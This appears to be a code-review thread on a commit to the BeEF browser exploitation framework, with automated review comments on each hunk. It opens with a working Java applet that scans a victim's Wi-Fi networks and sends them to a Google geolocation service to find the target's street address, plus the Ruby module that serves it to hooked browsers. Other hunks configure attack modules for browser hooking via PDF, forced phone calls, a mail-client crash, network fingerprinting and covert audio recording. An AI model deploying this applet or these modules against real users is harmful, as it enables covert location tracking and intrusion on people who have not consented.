import java.applet.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class getGPSLocation extends Applet{
public static String result = "";
public getGPSLocation(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
//System.out.println("This is Windows Machine");
result=getWindows();
} else if (isMac()) {
//System.out.println("This is Mac Machine");
result=getMac();
} else {
//System.out.println("Your OS is not support!!");
}
}
public static String getWindows(){
String result = null;
try {
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");
BufferedReader in = new BufferedReader(
new InputStreamReader(p.getInputStream()));
String line = null;
String signal = null;
String ssidStr = null;
while ((line = in.readLine()) != null) {
Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(2);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
}
Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
Matcher m2 = p2.matcher(line);
if(m2.find()){
bssidList.add(m2.group(2));
}
Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
Matcher m3 = p3.matcher(line);
if(m3.find()){
signal = m3.group(2);
signal = signal.replaceAll("%","");
signal = signal.replaceAll(" ","");
signal = "-"+signal;
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
//System.out.println("I don't know where the target is");
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
try {
int j=0;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
while(j<ssidList.size()){
queryString+="&wifi=mac:";
queryString+=bssidList.get(j);
queryString+="%7C";
queryString+="ssid:";
queryString+=ssidList.get(j);
queryString+="%7C";
queryString+="ss:";
queryString+=rssiList.get(j);
j++;
}
//Get geocoordinates / Longitude and Latitude
String geoCoordinates = null;
URL url = new URL(queryString);
URLConnection urlc = url.openConnection();
urlc.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
BufferedReader reader = new BufferedReader(new InputStreamReader(urlc.getInputStream()));
for (String output; (output = reader.readLine()) != null;) {
//System.out.println(output);
if(output.indexOf("18000.0")>0){
result+="\nLocation is not accurate\n";
//System.out.println("Location is not accurate\n");
}
else{
if(output.indexOf("lat")>0){
output = output.replace("\"lat\" : ","");
output = output.replaceAll("^\\s+", "");
geoCoordinates = output;
result+="\nLatitude: ";
result+=output;
//System.out.println("Latitude: "+output);
}
if(output.indexOf("lng")>0){
output = output.replace("\"lng\" : ","");
output = output.replaceAll("^\\s+", "");
geoCoordinates += output;
result+="\nLongitude: ";
result+=output;
//System.out.println("Longitude: "+output);
}
}
}
//Reverse geocoordinates to street address
String reverseGeo = "https://maps.googleapis.com/maps/geo?q="+geoCoordinates+"&output=json&sensor=true_or_false";
//System.out.println(reverseGeo);
URL url1 = new URL(reverseGeo);
URLConnection urlc1 = url1.openConnection();
urlc1.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
BufferedReader reader1 = new BufferedReader(new InputStreamReader(urlc1.getInputStream()));
for (String output1; (output1 = reader1.readLine()) != null;) {
if(output1.indexOf("address")>0){
output1 = output1.replace("\"address\": ","");
output1 = output1.replace("\",","");
output1 = output1.replace("\"","");
output1 = output1.replaceAll("^\\s+", "");
result+="\nAddress is ";
result+=output1;
//System.out.println("Address is "+output1);
}
}
String mapAddress = "http://maps.google.com/maps?q="+geoCoordinates+"+%28You+are+located+here%29&iwloc=A&hl=en";
result+="\n"+mapAddress;
//System.out.println("\n"+mapAddress);
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String getMac(){
String result = null;
try {
Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
String ssidStr = null;
String signal = null;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
line = in.readLine();
while ((line = in.readLine()) != null) {
line = line.replaceAll("^\\s+", "");
Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(1);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
bssidList.add(m1.group(2));
signal = m1.group(3);
signal = signal.replaceAll(" ","");
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
//System.out.println("I don't know where the target is");
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
// windows
return (os.indexOf("win") >= 0);
}
public static boolean isMac() {
String os = System.getProperty("os.name").toLowerCase();
// Mac
return (os.indexOf("mac") >= 0);
}
public static boolean isLinux() {
String os = System.getProperty("os.name").toLowerCase();
// linux or unix
return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
}
}
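Review bot: In getMac() the capture-group indexes do not match the pattern. With `((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)`, group 2 is the inner `(.?)` and group 3 is the last five octets of the address, so `bssidList.add(m1.group(2))` and `signal = m1.group(3)` store the wrong fields, and group 1 carries the first octet along with the SSID. Use non-capturing groups for the repeated parts and compile the pattern once outside the loop. Separately, googleLookup() leaves `geoCoordinates` null when no "lat" line is read and still concatenates it into the following URLs, and neither the readers nor the `Process` are ever closed; check for null before the second request and close the streams in a finally block.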

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_physical_location < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
end
def post_execute
save({'result' => @datastore['location_info']})
end
end
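Review bot: pre_send binds getGPSLocation.jar at the fixed path '/getGPSLocation' and post_execute only saves the result, so the jar stays mounted on the server after the command has finished. Release the binding once the result is in, and add a short comment on the class saying what `location_info` is expected to contain. The licence header also reads "Copyright 2011" on a file added in a 2012 commit.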

@@ -22,5 +22,8 @@ beef:
description: "This module will retrieve basic information about the host system using an unsigned Java Applet. <br/><br/>The details will include:<br/> <ul><li> - Operating system details</li><li> - Java VM details</li><li> - NIC names and IP</li><li> - Number of processors</li><li> - Amount of memory</li><li> - Screen display modes</li></ul>"
authors: ["bcoles", "antisnatchor"]
target:
not_working:
ALL:
os: ["iPhone", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]

@@ -22,5 +22,8 @@ beef:
description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
authors: ["saafan"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["All"]
user_notify: ["FF", "C"]

@@ -16,7 +16,7 @@
beef:
module:
insecure_url_skype:
enable: true
enable: false
category: "Host"
name: "Make Skype Call (Skype)"
description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes<br><br>The protocol handler used will be: skype."
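Review bot: `enable` goes from true to false for insecure_url_skype with nothing in the file saying why. Add a one-line comment above the key giving the reason (broken, superseded, too intrusive for the user) so the next maintainer knows whether it is safe to turn back on.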

@@ -22,4 +22,9 @@ beef:
description: "This module will force the browser to attempt a telephone call in iOS. It will exploit the insecure handling of URL schemes in iOS.<br><br>The protocol handler used will be: tel"
authors: ["xntrik", "Nitesh Dhanjani"]
target:
user_notify: ['S']
user_notify:
S:
os: ["iPhone"]
not_working:
ALL:
os: ["All"]

@@ -19,8 +19,7 @@ beef:
enable: true
category: "IPEC"
name: "Windows Mail Client DoS"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Win7-sp2)."
notes: "The protocol handler used will be: nntp.<br /><br />"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Windows 7 SP2).<br /><br />The protocol handler used will be: nntp."
authors: ["bcoles"]
target:
user_notify: ["FF", "S"]
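Review bot: The reworded description still claims the client is vulnerable in "Windows 7 SP2"; Windows 7 only ever shipped SP1, so state the version and service pack that was actually tested. Expanding "Win7-sp2" to "Windows 7 SP2" makes the wrong claim more prominent rather than fixing it.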

@@ -88,6 +88,15 @@ beef.execute(function() {
new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100),
new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31),
new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59),
new Array("Xerox Printer",":80",false,"/printbut.gif",30,30),
new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26),
new Array("Epson Printer",":80",false,"/cyandot.gif",1,1),
new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60),
new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30),
new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16),
new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149),
new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32),
new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16)
);

@@ -15,7 +15,7 @@
#
beef:
module:
fingerprint_network:
internal_network_fingerprinting:
enable: true
category: "Network"
name: "Fingerprint Network"

@@ -33,7 +33,7 @@
# - Local IP theft with Java is slow and may fail
class Fingerprint_network < BeEF::Core::Command
class Internal_network_fingerprinting < BeEF::Core::Command
def self.options
return [

@@ -2,7 +2,7 @@
#
beef:
module:
Beep:
phonegap_beep:
enable: true
category: "Phonegap"
name: "Beep"

@@ -1,7 +1,7 @@
# phonegap
#
class Beep < BeEF::Core::Command
class Phonegap_beep < BeEF::Core::Command
def post_execute
content = {}

@@ -2,7 +2,7 @@
#
beef:
module:
Detect:
phonegap_detect:
enable: true
category: "Phonegap"
name: "Detect PhoneGap"

@@ -1,7 +1,7 @@
# phonegap
#
class Detect < BeEF::Core::Command
class Phonegap_detect < BeEF::Core::Command
def post_execute
content = {}

@@ -2,7 +2,7 @@
#
beef:
module:
File_upload:
phonegap_file_upload:
enable: true
category: "Phonegap"
name: "Upload File"

@@ -1,7 +1,7 @@
# phonegap
#
class File_upload < BeEF::Core::Command
class Phonegap_file_upload < BeEF::Core::Command
def self.options
return [{

@@ -2,7 +2,7 @@
#
beef:
module:
Geo_locate:
phonegap_geo_locate:
enable: true
category: "Phonegap"
name: "Geolocation"

@@ -1,7 +1,7 @@
# phonegap
#
class Geo_locate < BeEF::Core::Command
class Phonegap_geo_locate < BeEF::Core::Command
def post_execute
content = {}

@@ -2,7 +2,7 @@
#
beef:
module:
List_files:
phonegap_list_files:
enable: true
category: "Phonegap"
name: "List Files"

@@ -1,7 +1,7 @@
# phonegap
#
class List_files < BeEF::Core::Command
class Phonegap_list_files < BeEF::Core::Command
def self.options
return [{

@@ -2,7 +2,7 @@
#
beef:
module:
Persistence:
phonegap_persistence:
enable: true
category: "Phonegap"
name: "Persistence"

@@ -1,7 +1,7 @@
# phonegap persistenece
#
class Persistence < BeEF::Core::Command
class Phonegap_persistence < BeEF::Core::Command
def self.options
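Review bot: The header comment on the first line of this hunk reads `# phonegap persistenece`; correct the spelling to "persistence" while the class line below it is being changed anyway.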

@@ -2,7 +2,7 @@
#
beef:
module:
Start_record_audio:
phonegap_start_record_audio:
enable: true
category: "Phonegap"
name: "Start Recording Audio"

@@ -1,7 +1,7 @@
# phonegap
#
class Start_record_audio < BeEF::Core::Command
class Phonegap_start_record_audio < BeEF::Core::Command
def self.options
return [

@@ -2,7 +2,7 @@
#
beef:
module:
Stop_record_audio:
phonegap_stop_record_audio:
enable: true
category: "Phonegap"
name: "Stop Recording Audio"

@@ -0,0 +1,7 @@
# phonegap
#
class Phonegap_stop_record_audio < BeEF::Core::Command
end

@@ -1,7 +0,0 @@
# phonegap
#
class Stop_record_audio < BeEF::Core::Command
end

@@ -4,7 +4,6 @@ require 'capybara'
Capybara.run_server = false # we need to run our own BeEF server
require 'selenium/webdriver'
require "selenium"
class BeefTest
@@ -41,4 +40,4 @@ class BeefTest
victim
end
end
end

@@ -7,12 +7,14 @@ class TC_login < Test::Unit::TestCase
def test_log_in
session = Capybara::Session.new(:selenium)
session.visit(ATTACK_URL)
sleep 2.0
BeefTest.save_screenshot(session)
session.has_content?('BeEF Authentication')
session.fill_in 'user', :with => 'beef'
session.fill_in 'pass', :with => 'beef'
BeefTest.save_screenshot(session)
session.click_button('Login')
sleep 20.0
session.has_content?('logout')
BeefTest.save_screenshot(session)
end
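Review bot: `session.has_content?('BeEF Authentication')` and `session.has_content?('logout')` discard their return values, so test_log_in passes even when the login fails, and the added `sleep 2.0` and `sleep 20.0` only make the run slower. Wrap both checks in `assert` and rely on Capybara's own wait for the content instead of fixed sleeps.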

@@ -21,7 +21,6 @@ require 'capybara'
Capybara.run_server = false # we need to run our own BeEF server
require 'selenium/webdriver'
require "selenium"
require './check_environment' # Basic log in and log out tests
require './tc_login' # Basic log in and log out tests

@@ -1,2 +1,2 @@
load msgrpc Pass=abc123
load msgrpc ServerHost=127.0.0.1 Pass=abc123
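Review bot: `ServerHost=127.0.0.1` pins the RPC listener to loopback explicitly, which is good, but `Pass=abc123` remains a guessable password committed to the repository. Add a comment that this file is for the local test rig only, or have the test setup generate the password and hand the same value to both sides.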

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'test/unit'
class TC_Logger < Test::Unit::TestCase
def setup
$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '.'))
$root_dir = File.expand_path('../../../../', __FILE__)
end
def test_logger
assert(true)
end
end
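Review bot: setup runs `$:.unshift(...)` before every test, so the load path gains a duplicate entry each time a test in this class runs, and `$root_dir` is a process-wide global that the other test cases can see and overwrite. Move both lines to file level, or guard the unshift so the directory is added only once.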

@@ -25,5 +25,8 @@ class TC_EventLogger < Test::Unit::TestCase
def test_event_logger
assert(true)
end
def test_no_params
assert(true)
end
end

@@ -25,5 +25,26 @@ class TC_Proxy < Test::Unit::TestCase
def test_proxy
assert(true)
end
def test_delete
assert(true)
end
def test_put
assert(true)
end
def test_head
assert(true)
end
def test_no_params
assert(true)
end
def test_zero_values
assert(true)
end
def test_one_values
assert(true)
end
def test_neg_one_values
assert(true)
end
end
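Review bot: The seven added tests (test_delete through test_neg_one_values) all reduce to `assert(true)`, so the suite reports them as passing while nothing in the proxy is exercised. Until they are implemented, make them fail or skip visibly, and say in a comment which request fields test_zero_values, test_one_values and test_neg_one_values are meant to vary.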

@@ -25,5 +25,26 @@ class TC_Requester < Test::Unit::TestCase
def test_requester
assert(true)
end
def test_delete
assert(true)
end
def test_put
assert(true)
end
def test_head
assert(true)
end
def test_no_params
assert(true)
end
def test_zero_values
assert(true)
end
def test_one_values
assert(true)
end
def test_neg_one_values
assert(true)
end
end

@@ -26,13 +26,14 @@ require './core/tc_modules'
require './core/tc_social_engineering'
require './core/tc_autorun'
require './core/tc_obfuscation'
require './core/tc_event_logger'
require './core/tc_logger'
require './extensions/tc_xssrays'
require './extensions/tc_vnc'
require './extensions/tc_ipec_tunnel'
require './extensions/tc_hackverter'
require './extensions/tc_proxy'
require './extensions/tc_requester'
require './extensions/tc_event_logger'
require './tc_grep'
require './tc_filesystem'
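Review bot: Both `require './core/tc_event_logger'` and `require './extensions/tc_event_logger'` appear in this list. If both files define TC_EventLogger, the second one reopens the class and any test method with the same name silently replaces the first. If the event logger test moved to extensions, drop the core require; if both are meant to exist, give the classes distinct names.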
@@ -52,6 +53,7 @@ class TS_BeefTests
suite << TC_Xssrays.suite
suite << TC_Vnc.suite
suite << TC_Obfuscation.suite
suite << TC_Logger.suite
suite << TC_IpecTunnel.suite
suite << TC_Requester.suite
suite << TC_Proxy.suite